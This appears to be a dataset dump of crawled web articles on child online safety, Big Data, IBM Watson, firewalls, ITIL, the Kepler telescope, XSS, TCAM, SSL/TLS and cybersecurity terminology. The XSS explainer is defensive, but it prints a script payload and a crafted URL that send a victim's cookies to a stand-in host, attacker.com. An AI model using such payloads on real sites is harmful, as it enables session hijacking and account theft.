text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
The Internet provides children with wonderful social and developmental opportunities. However, parents should never forget that cybercriminals and scammers are a constant source of danger online and that, like adults, children are not immune.
Children make extensive use of Internet resources such as search engines, social networks and email. All of these are a potential source of threats, namely the distribution of links to phishing or pornographic websites as well as adult content spam which may negatively affect a child’s psyche and expose the computer to the risk of malware infection.
What can parents do in this situation?
“Currently, the Internet Security products offered by many companies feature a setting that can be used to protect your child against a number of threats. You can choose the solution most suitable in terms of the possible restrictions, the flexibility of the settings, etc.,” explains Konstantin Ignatyev, Kaspersky Lab’s Web Content Analysts Group Manager. “Using built-in security solutions is just the first real step you can take to ensure that your child is protected against the potential dangers of the Internet.”
There are a number of additional ways to protect your child online:
- enable the SafeSearch features available in most popular search systems;
- configure special settings in social network and IM accounts;
- make use of email filters;
- install additional software to help control your child’s online activity;
- explain a set of simple rules to your child that must be followed when surfing the web.
Detailed instructions on settings can be found in the article ‘Kids on the Internet: safe surfing at home’ by Konstantin Ignatyev at: www.securelist.com. | <urn:uuid:cf42ffaa-f5b1-454e-ab5a-32100fad0326> | CC-MAIN-2017-04 | http://www.kaspersky.com/au/about/news/virus/2011/Safety_First_for_Children_Online | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00084-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.911522 | 353 | 3.265625 | 3 |
How an Ancient Greek made the first Big Data decision and earned a fortune.
Thales was an ancient Greek philosopher who lived around 600BC in Miletus which is in present day Turkey. He is enormously important in history because, before Thales, the only way to explain events was to tell stories about the Gods. Thunder? Well, it’s the sound made by the Cyclopes forging with their hammer the thunderbolts of Zeus. Obviously.
Thales introduced the idea that you could instead use data and intelligence to explain physical processes. He didn’t create the first “database”, but I would say he created the first Big Data database because he recorded all data he could get his hands on, whether it immediately seemed to be important or not. One of the first uses he put this database to was in predicting the weather.
Despite making so many contributions to what would later become Science, he took a lot of stick from his contemporaries.
“Hey, Thales – if you’re so clever, why are you not rich?”
He would patiently explain that the problems he was interested were pure and interesting without being necessarily profitable. It is reasonable to imagine that this did not silence his critics, because he felt compelled to teach them a lesson.
Aristotle takes up the story in his book “Politics”.
“But he, deducing from his knowledge of stars that there would be a good crop of olives, while it was still winter raised a little capital and used it to pay deposits on all the oil-presses in Miletus and Chios, thus securing an option on their hire. This cost him only a small sum as there were no other bidders. Then the time of the harvest came and as there was a sudden and simultaneous demand for oil-presses, he hired them out at any price he liked to ask. He made a lot of money and so demonstrated that it is easy for philosophers to be rich, if they want to.”
What Thales had done here was to invent a way to monetise big data. He had also incidentally invented the ideas of “options” and “monopoly”. It makes me wonder whether the best thing we can do to stimulate the economy today is to mock a few philosophers …
The story of Thales illustrates one possibility you get with Big Data – you have the potential to found a totally new industry (for example Google) or to turn an older industry inside-out (like Amazon).
This is an opportunity that is open in all areas of business, not just in businesses completely built out of data like Google. Big Data is revolutionising astronomy, the car industry, professional sports, online gaming, Marketing etc. etc.
There are other advantages of the Big Data approach which aren’t quite as sexy, but as every bit as powerful.
With Big Data you can understand your customers better and so serve them better – harvest every bit of data on your customers and squeeze the pips out of it.
Result: Happy customers who stay with you and are quite likely to buy more of what you’re selling.
If you can understand your internal processes better, you can operate more efficiently and predictably.
Result: Happy stockholders.
You can also more effectively hunt for new customers.
Result: Everyone happy.
These last three points are almost a definition of how to run a business well – these are ambitions that businessmen from Ancient Greece would have recognised – it’s just that nowadays, with Big Data approaches you have a totally new way to get an edge over your competitors.
Big Data is something you should invest in, not because it is new and way-cool (although it is). You should invest in Big Data because it is a good investment that generates a positive financial return that can be measured in all the old-fashioned ways – customer volumes, revenue per customer and good old-fashioned cost savings.
And to finish, I can’t resist a quick piece of selling – EXASOL make the fastest, easiest to operate database in the world and it is exactly the engine you need to power your Big Data applications. You can download a free version of our software and try it with your data within minutes. | <urn:uuid:bcbbd3ba-ad34-4f9f-b778-fb325acdfb76> | CC-MAIN-2017-04 | http://www.exasol.com/en/blog/2015-04-01-first-big-data/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00506-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.97418 | 885 | 3.234375 | 3 |
The pioneering “man-versus-machine” match on Jeopardy last night has a lot of people thinking, and writing, about artificial intelligence. Developing a machine capable of understanding the nuances of human language is one of the biggest computing challenges of our day. Natural language processing is a domain where most five-year-olds can outperform even the most powerful supercomputers. To illustrate, researchers often refer to the “Paris Hilton” problem. It is difficult for the machine to know whether the phrase refers to the celebrity or the hotel. IBM developed its Watson supercomputer to be able to handle these kinds of complex language processing tasks, to understand the finer points of human language, such as subtlety and irony.
Last night was Watson’s official debut in the first night of a two-game match. Ending in a tie, Watson has proven to be a worthy opponent, well-matched to human champions Ken Jennings and Brad Rutter. With “Paris Hilton” type problems, Watson would use additional clues (for example, if provided with the phrase “Paris Hilton reservation”) to distinguish the two meanings. Drawing from a vast knowledge databank, the supercomputer relies on its ability to link similar concepts to come up with several best guesses. Then it uses a ranking algorithm to select the answer with the highest probablity of correctness. Read more about what makes Watson tick, here and here.
Watson’s performance on Jeopardy signifies a big leap for the field of machine learning. The next big advance will come when Watson, or another, possibly similar, machine, beats the Turing test. A successful outcome occurs when, in the context of conversation, we can no longer tell the difference between a human and a computer. Some maintain that a machine cannot truely be considered intelligent until it has passed this litmus test, while others criticize the test for using too narrow a definition of intelligence.
Although the Jeopardy match could be considered mere entertainment, or clever marketing depending on how you look at it, there are commercial applications which IBM plans to develop in fields as diverse as healthcare, education, tech support, business intelligence, finance and security.
Turing test aside, Watson’s abilities speak to considerable progess on the AI front with real world implications. If you think of artificial intelligence as a continuum, let’s say a ladder, instead of a discrete step, then one of the bottom and more attainable wrungs could be labeled “intelligence augmentation” with the highest wrungs reserved for a true thinking machine, a la the Singularity theory, most commonly associated with futurist Ray Kurzweil.
Both of these concepts have received some attention recently with The New York Times’ John Markoff citing major developments in intelligence augmentation and a Time Magazine article providing a thorough treatment of the Singularity model.
According to Markoff, “Rapid progress in natural language processing is beginning to lead to a new wave of automation that promises to transform areas of the economy that have until now been untouched by technological change.”
Markoff cites personal computing as a major component in the rise of intelligence augmentation, in that it has provided humans with the tools for gathering, producing and sharing information and has pretty much single-handedly created a generation of knowledge workers.
The editor of the Yahoo home page, Katherine Ho, uses the power of computers to reorder articles to achieve maximum readership. With the help of specialized software, she can fine-tune the articles based on readers’ tastes and interests. Markoff refers to Ms. Ho as a “21st-century version of a traditional newspaper wire editor,” who instead of relying solely on instinct, bases decisions on computer-vetted information.
An example of computational support taken one step further is the Google site, which relies solely on machine knowledge to rank its search results. As Markoff notes, computational software can be used to extend the skills of a human worker, but it can also be used to replace the worker entirely.
Markoff concludes that “the real value of Watson may ultimately be in forcing society to consider where the line between human and machine should be drawn.”
The Singularity, the subject of the Time Magazine article, also deals with the dividing line between human and machine, but takes the idea quite a bit further. In his 2001 essay The Law of Accelerating Returns, Kurzweil defines the Singularity as “a technological change so rapid and profound it represents a rupture in the fabric of human history.” It can also be explained as the point in the future when technological advances begin to happen so rapidly that normal humans cannot keep pace, and are “cut out of the loop.” Kurzweil predicts this transformative event will occur by the year 2045, a mere 35 years away.
We don’t know what such a radical change would entail because by the very nature of the prediction, we’re not as smart as the future machines will be. But the article cites some of the many theories: Humankind could meld with machines to become super-intelligent cyborgs. We could use life science advances to delay the effects of old age and possibly cheat death indefinitely. We might be able to download our consciousness into software. Or perhaps the future computational network will turn on humanity, a la Skynet. As Lev Grossman, author of the Time Magazine article, writes, “the one thing all these theories have in common is the transformation of our species into something that is no longer recognizable” from our current vantage point.
How can such an earth-shattering event possibly occur by the year 2045, you wonder. Well the simple answer is that computers are getting much faster, but more pertinently, the speed at which computers are getting faster is also increasing. Supercomputers, for example, are growing roughly one-thousand times more powerful every decade. Doing the math, we see a staggering trillion-fold increase in only 30 years. This is the law of accelerating returns in action, and this exponential technology explosion is what will propel the Singularity, according to its supporters.
This degree of computational progress is such that it’s almost impossible for the human mind to fully grasp; humans naturally intuit that the pace of change will continue at the current rate. We have evolved to accept linear advances or small degrees of exponential inclines, but the massive advances proposed by Singularity supporters truely boggle the mind. This is something Kurzweil is quick to point out in his books and his public speaking engagements.
As for assertions that Kurzweil is underestimating the difficulty of the challenges involved with advanced machine intelligence, for example the complexity of reverse-engineering the human brain, Kurtzweil responds in kind, charging his critics with underestimating the power of exponential growth.
To the naysayers, Grossman responds:
You may reject every specific article of the Singularitarian charter, but you should admire Kurzweil for taking the future seriously. Singularitarianism is grounded in the idea that change is real and that humanity is in charge of its own fate and that history might not be as simple as one damn thing after another. Kurzweil likes to point out that your average cell phone is about a millionth the size of, a millionth the price of and a thousand times more powerful than the computer he had at MIT 40 years ago. Flip that forward 40 years and what does the world look like? If you really want to figure that out, you have to think very, very far outside the box. Or maybe you have to think further inside it than anyone ever has before. | <urn:uuid:5b414987-82c0-4fc4-8cef-298e578a0a0f> | CC-MAIN-2017-04 | https://www.hpcwire.com/2011/02/15/watsons_debut_sparks_intelligent_conversation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281421.33/warc/CC-MAIN-20170116095121-00222-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.940295 | 1,598 | 2.859375 | 3 |
By now, you already know that installing a firewall is very important. Firewalls protect your network, and the data being sent on it, from outside and inside threats. They inspect traffic, prevent access to internal networks, and protect against external threats.
Not having the right firewall is going to cost your business both financially and in reputation.
Because you know the importance of having a firewall up and running, we’re going to go over the notable strides that firewalls are currently making, and how they are going to save you in 2017 more than ever.
In recent years, many major websites have been knocked offline by Denial of Service (DoS) and Distributed Denial of Service (DDoS) attacks. These attacks bring on a sudden reduction in bandwidth and performance usually with no warning. According to research from Kaspersky Lab, one in five working IT professionals do not have protection against DDoS attacks, with many not knowing what steps to take if their system is attacked.
Attackers are increasing the potentness of malware attached to the botnets, making their attacks more significant. Hackers can and will continue to exploit device vulnerabilities to launch more DDoS attacks. Modern firewalls, like Palo Alto and Cisco ASA, are now learning to help identify and stop these DDoS attacks at their most basic levels.
It’s important to confirm that you have monitoring systems in place before replacing or investing in new systems. Log monitoring, intrusion detection systems, and intrusion prevention systems can detect DDoS threats before they become actual breaches.
If you combine these resources, you’re giving yourself a more intensive solution for protection against potentially dangerous traffic.
Hackers have been using ports for access as long as ports have existed. Most ISPs have standard ports they use, so it’s really easy for hackers to figure out the configuration and deploy attacks. If there are specific services that you want to protect from an attack, you should use alternative ports, also known as masquerade ports.
For instance, Remote Desktop Protocol (Port 3389) is a commonly used port that cyber criminals frequently target during attacks. To prevent them from using this port, you can manually change the RDP port to another port, and configure the firewall to translate that port to the standard RDP port. This process is known as filter-based forwarding — and if you don’t already know how to do it, we can show you.
Knowing how to forward ports can help you out whether you’re studying for Juniper security or CompTIA Security+ certs, or if you just want to learn a bit more about port security.
It would be surprising if you hadn’t heard about devices that becoming embedded with electronics, software, sensors, actuators, and network connectivity that enable them to collect and exchange data.
The internetworking of these devices is being called the Internet of Things (IoT). The concept of the IoT is growing every day. IoT devices are also increasing the potential attack surface for hackers. DDoS bots have the ability to target devices and use them to commence a DDoS attack.
Installing a firewall to protect your new devices could be key to protecting them from threats that hackers are creating daily. You also might want to encrypt data on the IoT device and in route to and from other IoT devices.
You might consider segmenting IoT devices from other segments as part of a Zero Trust architecture. Additionally, you can add proper hooks in the software so that operators can perform identity and access management (IAM).
In choosing a firewall protection system, you should definitely consider selecting options with additional features. Certain types of firewalls send alerts to admins the moment that attacks happen. There also are options that integrate VPNs within their architecture for remote workers. You should always consider firewall vendor with strong customer support that provides the necessary help and resources to ensure the security of your network. For instance, you might want to consider Palo Alto versus Cisco ASA. (Or vice versa.)
Firewalls exist to help you evaluate your company’s security risks. They are evolving rapidly as a cloud technology as software-defined networks take hold. This is going to open the door to drastic changes in the current firewall model, or it might even create a completely new category of network protection.
Regardless, we’re going to get you the most current training on whichever direction firewall security goes and make sure that you are a firewall expert.
Set yourself up in 2017 for security and safety by bringing in a firewall. You can thank us later.
Want to learn more about firewalls? Not a CBT Nuggets subscriber? Start your free week now. | <urn:uuid:ff9bf775-17c1-47b9-9382-dc382ae7b9af> | CC-MAIN-2017-04 | https://blog.cbtnuggets.com/2017/01/3-threat-reducing-firewall-features/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279169.4/warc/CC-MAIN-20170116095119-00527-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.945189 | 958 | 2.609375 | 3 |
The Information Technology Infrastructure Library (ITIL) is growing in popularity among IT leaders. However, many IT leaders don't truly understand ITIL basics. Many IT leaders see ITIL as a quick solution to IT chaos. Indeed, blindly following ITIL is doomed to failure.
This note addresses the following topics:
- What ITIL is and how it works.
- Users of ITIL.
- Benefits of ITIL.
- ITIL basic structure and overview of ITIL core concepts.
- What ITIL is not – common misconceptions about ITIL.
ITIL involves adopting and adapting IT processes and approaches that are new to many SMEs. IT leaders must establish specific goals prior to adopting this framework. | <urn:uuid:5062e1ce-84ad-401b-86be-4a4b30fadc73> | CC-MAIN-2017-04 | https://www.infotech.com/research/best-practices-in-itil-service-management | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00435-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.905519 | 147 | 2.671875 | 3 |
NASA's Kepler space telescope is in trouble.
The telescope, launched in 2009 in search of Earth-like planets, has lost the use of one of the four wheels that control its orientation in space. Kepler, for the second time this month, has gone into safe mode, NASA reported Wednesday afternoon.
With NASA no longer able to manipulate the telescope's positioning, ground engineers also are having a hard time communicating with it since the communications link comes and goes as the spacecraft spins uncontrollably.
This is the second wheel failure Kepler has suffered.
"This is a clear indication that there has been an internal failure within the reaction wheel, likely a structural failure of the wheel bearing," NASA reported. "With the failure of a second reaction wheel, it's unlikely that the spacecraft will be able to return to the high pointing accuracy that enables its high-precision photometry. However, no decision has been made to end data collection."
The telescope is stable and safe at this point. Engineers, though, are working to minimize the amount of fuel that the spacecraft is using while they try to control its orientation with its thrusters.
Kepler has been considered a success, wrapping up its primary three-and-a-half-year mission and entering a second phase of research last November. NASA scientists had been hoping that Kepler would continue working for another four years.
Since it began its work on May 12, 2009, the telescope has searched more than 100,000 stars for signs of Earth-like planets in the habitable zone, an area that may have water. The telescope has so far confirmed more than 100 such planets.
The telescope is onboard a spacecraft that is carrying several computers. Kepler is designed to measure the brightness of stars every half hour, allowing scientists to detect any dimming that would be caused by orbiting planets passing in front of them.
Scientists receive enough data from Kepler to determine not only the size of a planet but whether it has a solid surface and its potential to hold water, something considered crucial to the formation of life.
Last month, the space agency announced that Kepler had discovered two planets that are perfectly sized and positioned to potentially hold life.
Scientists are not saying hey actually have discovered life on the newfound planets, which are about 1,200 light years away. However, they did say they're one step closer to finding a world similar to Earth that orbits a star like our sun.
NASA announced on Wednesday that even if Kepler's mission is over, it has gathered enough information to keep scientists busy analyzing it for years.
This article, NASAs planet-hunting telescope is spinning out of control, was originally published at Computerworld.com.
Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed. Her email address is email@example.com.
Read more about emerging technologies in Computerworld's Emerging Technologies Topic Center.
This story, "NASA's planet-hunting telescope is spinning out of control" was originally published by Computerworld. | <urn:uuid:dc4aaf48-5fec-484f-95bf-60460052da99> | CC-MAIN-2017-04 | http://www.itworld.com/article/2710631/hardware/nasa-s-planet-hunting-telescope-is-spinning-out-of-control.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560285289.45/warc/CC-MAIN-20170116095125-00461-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963548 | 646 | 3.21875 | 3 |
To understand the Cross-site Scripting vulnerability you have to first understand the basic concept of the Same Origin Policy (SOP), which forbids websites to retrieve content from pages with another origin. By forbidding access to cross-origin content random websites cannot not read or modify data from your Facebook page or PayPal account while logged in to them.
SOP is one of the most important security principles in every web browser. For example the page
https://example.com/index.html can access content from
https://attacker.com/index.html cannot access content from
The Cross-site Scripting (XSS) Vulnerability
Cross-site Scripting, also known as XSS, is a way of bypassing the SOP concept. Whenever HTML code is generated dynamically, and the user input is not sanitized and is reflected on the page an attacker could insert his own HTML code. The web browser will still show the user's code since it pertains to the website where it is injected.
Different Types of Cross-Site Scripting Vulnerability
There are mainly three different types of Cross-site Scripting vulnerability; Stored, Reflected and DOM XSS. Below you can find a detailed technical explanation of each of them.
Stored Cross-site Scripting Vulnerability
Stored Cross-site scripting vulnerabilities happens when the payload is saved, for example in a database and then is executed when a user opens the page. Stored cross-site scripting is very dangerous for a number of reasons:
- The payload is not visible for the browser's XSS filter
- Users might accidentally trigger the payload if they visit the affected page, while a crafted url or specific form inputs would be required for exploiting reflected XSS.
Example of a Stored XSS
A stored XSS vulnerability can happen if the username of an online forum member is not properly sanitized when it is printed on the page. In such case an attacker can insert malicious code when registering a new user on the form. When the username is reflected on the forum page, it will look like this:
Registered since: 2016
The above code is triggered every time a user visits this forum section, and it sends the users' cookies of the forum to the attacker, who is then able to use them to hijack their sessions. Stored XSS can be a very dangerous vulnerability since it can have the effect of a worm, especially when exploited on popular pages.
For example imagine a forum or social media website that has a public facing page that is vulnerable to a stored XSS vulnerability, such as the profile page of the user. If the attacker is able to place a malicious payload that adds itself to the profile page, each time someone opens it the payload will spread itself with an exponential growth.
Reflected Cross-site Scripting (XSS) Vulnerability
A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored. This means that an attacker has to send a crafted link or post form to the victim to insert the payload, and the victim should click the link. This kind of payload is also generally being caught by built in browser XSS filters, like in Chrome, Internet Explorer or Edge.
Example of a Reflected XSS
As an example we will use a search functionality on a news website, which works by appending the user's input, which is taken from the GET request, to the q parameter, as per the example below:
In the search results the website reflects the content of the query that the user searched for, such as:
You searched for "data breach":
If the Search functionality is vulnerable to a reflected cross-site scripting vulnerability, the attacker can send the victim a link such as the below:
https://example.com/news?q=<script>document.location='https://attacker.com/log.php?c=' + encodeURIComponent(document.cookie)</script>
Once the victim clicks on the link, the website will display the following:
You searched for "<script>document.location='https://attacker.com/log.php?c=' + document.cookie</script>":
The HTML source code, which is reflecting the attacker's malicious code redirects the victim to a website that is controlled by the attacker, which can then record the user's current cookie for example.com as GET parameter.
DOM Based Cross-Site Scripting Vulnerability
The DOM Based XSS vulnerability happens in the DOM (Document Object Model) instead of part of the HTML. Read DOM Based Cross-site Scripting (XSS) vulnerability for a detailed explanation of DOM XSS.
Impacts of the Cross-site Scripting Vulnerability
The impact of an exploited XSS vulnerability varies a lot. It ranges from Session Hijacking to the disclosure of sensitive data, CSRF attacks and more. By exploiting a cross-site scripting vulnerability an attacker can impersonate the victim and take over the account. If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account. Read about the apache.org jira incident for more information on how a XSS vulnerbility was used in a succesful attack which also led to code execution.
Preventing XSS Vulnerabilities
Even though most modern web browsers have an inbuilt XSS filter they should not be seen as an alternative to sanitization. They cannot catch all kinds of cross-site scripting attacks and are not strict so not to lead to false positives, which would prevent some pages from loading correctly. A web browser's XSS filter should only be a "second line of defense" and the idea is to minimise the impact of existing vulnerabilities.
Developers should not use blacklists as there is a variety of bypasses for them. Another thing they should avoid using is the stripping of dangerous functions and characters as the browsers' XSS filters can't recognize the dangerous payloads when the output is tampered with allowing for possible bypasses. That being said, the only recommended prevention of XSS is encoding as mentioned above. | <urn:uuid:ab52a04d-c253-4e4c-9e6a-d19795759c69> | CC-MAIN-2017-04 | https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280801.0/warc/CC-MAIN-20170116095120-00095-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.906108 | 1,274 | 3.25 | 3 |
As this is networking blog I will focus mostly on the usage of CAM and TCAM memory in routers and switches. I will explain TCAM role in router prefix lookup process and switch mac address table lookup. However, when we talk about this specific topic, most of you will ask: how is this memory made from architectural aspect? How it is made in order to have the capability of making lookups faster than any other hardware or software solution? That is the reason for the second part of the article where I will try to explain in short how are the most usual TCAM memory build to have the capabilities they have.
CAM and TCAM memory
When using Ternary Content Addressable Memory TCAM inside routers it’s used for faster address lookup that enables fast routing. In switches Content Addressable Memory CAM is used for building and lookup of mac address table that enable L2 forwarding decisions. By implementing router prefix lookup in TCAM, we are moving process of Forwarding Information Base lookup from software to hardware. When we implement TCAM we enable the address search process not to depend on number of prefix entries because TCAM main characteristic is that it is able to search all its entries in parallel. It means that no matter how many address prefixes are stored in TCAM, router will find the longest prefix match in one iteration. It’s magic, right?
In routers, like High-End Cisco ones, TCAM is used to enable CEF – Cisco Express Forwarding in hardware. CEF is building FIB table from RIB table (Routing table) and Adjacency table from ARP table for building pre-prepared L2 headers for every next-hop neighbor. | <urn:uuid:33909354-6d96-4aff-a3ea-63a04a3bd30d> | CC-MAIN-2017-04 | https://howdoesinternetwork.com/tag/memory | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279248.16/warc/CC-MAIN-20170116095119-00215-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.908124 | 347 | 3.4375 | 3 |
SSL versus TLS – What’s the difference?
SSL versus TLS
TLS (Transport Layer Security) and SSL (Secure Sockets Layer) are protocols that provide data encryption and authentication between applications and servers in scenarios where that data is being sent across an insecure network, such as checking your email (How does the Secure Socket Layer work?). The terms SSL and TLS are often used interchangeably or in conjunction with each other (TLS/SSL), but one is in fact the predecessor of the other — SSL 3.0 served as the basis for TLS 1.0 which, as a result, is sometimes referred to as SSL 3.1. With this said though, is there actually a practical difference between the two?
See also our Infographic which summarizes these differences.
Which is more secure – SSL or TLS?
It used to be believed that TLS v1.0 was only marginally more secure than SSL v3.0, its predecessor. However, SSL v3.0 is getting very old and recent developments, such as the POODLE vulnerability have shown that SSL v3.0 is now completely insecure (especially for web sites using it). Even before the POODLE was set loose, the US Government had already mandated that SSL v3 not be used for sensitive government communications or for HIPAA-compliant communications. If that was not enough … POODLE certainly was. In fact, as a result of POODLE, SSL v3 is being disabled on web sites all over the world and for many other services as well.
SSL v3.0 is effectively “dead” as a useful security protocol. Places that still allow its use for web hosting as placing their “secure web sites” at risk; Organizations that allow SSL v3 use to persist for other protocols (e.g. IMAP) should take steps to remove that support at the soonest software update maintenance window.
Subsequent versions of TLS — v1.1 and v1.2 are significantly more secure and fix many vulnerabilities present in SSL v3.0 and TLS v1.0. For example, the BEAST attack that can completely break web sites running on older SSL v3.0 and TLS v1.0 protocols. The newer TLS versions, if properly configured, prevent the BEAST and other attack vectors and provide many stronger ciphers and encryption methods.
Unfortunately, even now a majority of web sites do not use the newer versions of TLS and permit weak encryption ciphers. Check how well your favorite web site is configured.
But wait — are not TLS and SSL different encryption mechanisms?
If you setup an email program you will often see separate options for “no encryption”, “SSL”, or “TLS” encryption of you transmission. This leads one to assume that TLS and SSL are very different things.
In truth, this labeling is a misnomer. You are not actually selecting which method to use (SSL v3 or TLS v1.x) when making this choice. You are merely selecting between options that dictate how the secure connection will be initiated.
No matter which “method” you choose for initiating the connection, TLS or SSL, the same level of encryption will be obtained when talking to the server and that level is determined by the software installed on the server, how that is configured, and what your program actually supports.
If the SSL vs TLS choice is not SSLv3 vs TLS v1.0+, what is it?
There are two distinct ways that a program can initiate a secure connection with a server:
- By Port (a.k.a. explicit): Connecting to a specific port means that a secure connection should be used. For example, port 443 for https (secure web), 993 for secure IMAP, 995 for secure POP, etc. These ports are setup on the server ready to negotiate a secure connection first, and do whatever else you want second.
- By Protocol (a.k.a. implicit): These connections first begin with an insecure “hello” to the server and only then switch to secured communications after the handshake between the client and the server is successful. If this handshake fails for any reason, the connection is severed. A good example of this is the command “STARTTLS” used in outbound email (SMTP) connections.
The “By Port” method is commonly referred to as “SSL” or “explicit” and the “By Protocol” method is commonly referred to as “TLS” or “implicit” in many program configuration areas.
Sometimes, you have only the option to specify the port and if you should be making a secure connection or not and the program itself guesses from that what method should be used … many old email programs like Outlook and Mac Mail did that. In such cases, you need to know if the program will try and explicit or implicit connection to initiate security, and choose your port appropriately (or else the connection could fail).
To Review: In email programs and other systems where you can select from SSL or TLS together with the port a connection will be made on:
- SSL means a “by port” explicit connection to a port that expects to the session to start with security negotiation
- TLS means a “by protocol” connection where the program will connect “insecurely” first and use special commands to enable encryption (implicit).
- Use of either could result in a connection encrypted with either SSL v3 or TLS v1.0+, based on what is installed on the sever and what is supported by your program.
- Both methods of connection (implicit and explicit) result in equally secure communications.
Sidebar: It is unclear why the “By Protocol” method is referred to as “TLS” as it could result in either TLS or SSL actually being used. It is likely because the folks who designed the SMTP protocol decided to name their command to switch to SSL/TLS in the SMTP protocol to “STARTTLS” (using “TLS” in the name as that is the newer protocol name). Then email programs started listing “TLS” next to this and “SSL” next to the old “By Port” option which came first. Once they started labeling things this way, that expanded to general use in the configuration of other protocols (like POP and IMAP) for “consistency”. I am not certain if this is the real reason, but based on my experience dealing with all versions of email programs and servers over the last 15 years, it seems very plausible.
Both methods ensure that your data is encrypted as it is transmitted across the Internet. They also both enable you to be sure that the server that you are communication with is the server you intend to contact and not some “middle man eavesdropper“. This is possible because servers that support SSL and TLS must have certificates issued to them by a trusted third party, like Verisign or Thawte. These certificates verify that the domain name they are issued for really belongs to the server (all about SSL certificates). Your computer will issue warnings to you if you try to connect to a server and the certificate that it gets back is not trusted or doesn’t match the site you are trying to connect to.
So then, should I choose TLS or SSL?
If you are configuring a server, you must install software that supports the latest version of the TLS standard, and configure it properly. This ensures that the connections that your users make are as secure as possible. Using an excellent security certificate will also help a lot — e.g. one with 2048+ bit keys, Extended Validation, etc. You should avoid using SSL v3 and should use only strong ciphers, especially if compliance of any kind is required.
If you are configuring a program (especially an email program) and have the option to connect securely via SSL or TLS, you should feel free to choose either one…. as long as it is supported by your server.
Note: many web browsers have special preference areas that allow you specifically enable/disable SSL v2, SSL v3, TLS v1.0, etc. In these cases you are actually telling the browser what versions of these security protocols you will allow your browser to use when establishing secure connections. We recommend turning off SSL v2 and SSL v3 (they provide no real security). Some web sites may support SSL v3 only; if you encounter one of these … please let them know that they are seriously behind the time and doing themselves and their visitors a serious disservice by pretending to provide safety while actually only providing broken, ancient encryption.
What happens if I do not select either one?
If neither SSL nor TLS is used, then the communications between you and the server can easily become a party line for eavesdroppers. Your data and your login information are sent in plain text for anyone to see; there is no guarantee that the server you connect to is not some middle man or interloper. For more on this, see: the case for email security.
Does LuxSci support these security protocols?
SSL/TLS form the basis of client-server security used by LuxSci for all of its services. Our web servers do not support SSL v3.0 and do support TLS v1.2; our web sites are protected against the BEAST and POODLE attacks. We use only strong, NIST-recommend ciphers for compliance reasons. We offer a variety of ports for connecting securely to POP, IMAP, and SMTP using both implicit and explicit methods for establishing TLS encryption. LuxSci also offers MySQL and WebMail over SSL and provides SSL for web hosting clients.
To ensure the integrity and security of your data, LuxSci strongly recommends taking advantage of our secure capabilities, such as enforced use of PGP, S/MIME, TLS, and email Escrow protocols.
Update for July, 2016: What about TLS v1.3?
TLS v1.3 is still an Internet Draft and the specifications for what will finally be in it and how exactly it will differ from v1.2 are not finalized. However, we do know some of things that v1.3 is going to provide. These include the complete removal of things that are known to be cryptographically weak such as MD5, RC4, and weak elliptic curves; dropping support for seldom-used features like compression and “change cipher” ciphers; and adding new elliptic curves.
Once TLS v1.3 is finalized and stable in the standard TLS libraries (e.g. openssl), I imagine we will see a strong push to move further away from TLS v1.0 and v1.1 and to use v1.2 and v1.3 exclusively. This seems to be the rapid trend. Who knows, maybe TLS v1.4 will start to include some of Google’s New Hope post-quantum algorithms.
- TLS Protocol RFC
- How Does Secure Socket Layer (SSL or TLS) Work?
- What is TLS/SSL?
- SMTP TLS: All About Secure Email Delivery over TLS
- How to Tell Who Supports TLS for Email Transmission
- What level of SSL or TLS is required for HIPAA? | <urn:uuid:83e890df-3624-4edf-a555-6fb2e0c257e9> | CC-MAIN-2017-04 | https://luxsci.com/blog/ssl-versus-tls-whats-the-difference.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280825.87/warc/CC-MAIN-20170116095120-00517-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.939096 | 2,381 | 3.390625 | 3 |
I’m feeling the walls of our linguisitic purity come crashing down, battered by the waves of language evolution. In short, I’m ready to acknowledge an increasingly popular usage, and start using the trendy term ‘Cybersecurity’.
Such terminological transitions are no new thing in a space that could still legitimately be labeled as ‘computer security’. Working for a beltway bandit in 1995, I have vivid memories of a passionate beer-fueled discussion over the relatively new term ‘information security’, and whether that was an appropriate designation for an increasingly significant discipline, or just a pretentious and hyped new label.
Since that time, my friends in the military-industrial ghetto have recharacterized the holistic approach to ensuring that nothing bad happens to stored communications as ‘information assurance,’ and arguably arriving several years later, the commercial world has an essentially equal set of expectations for the term ‘information risk management’.
Meanwhile, Gartner is fielding a record number of calls on ‘CYBER’ security topics. Unsurprisingly, the answers vary when we try to dig deeper into the underlying questions. When I asked one Cybersecurity vendor just what they thought the term meant, they explained that it referred to ‘computer security–with the Internet’. Given that I’ve been on the Internet, and involved in security topics, since 1987, I just didn’t find that a satisfactory answer at the time. Yet, the more I think about it, the more it rings true.
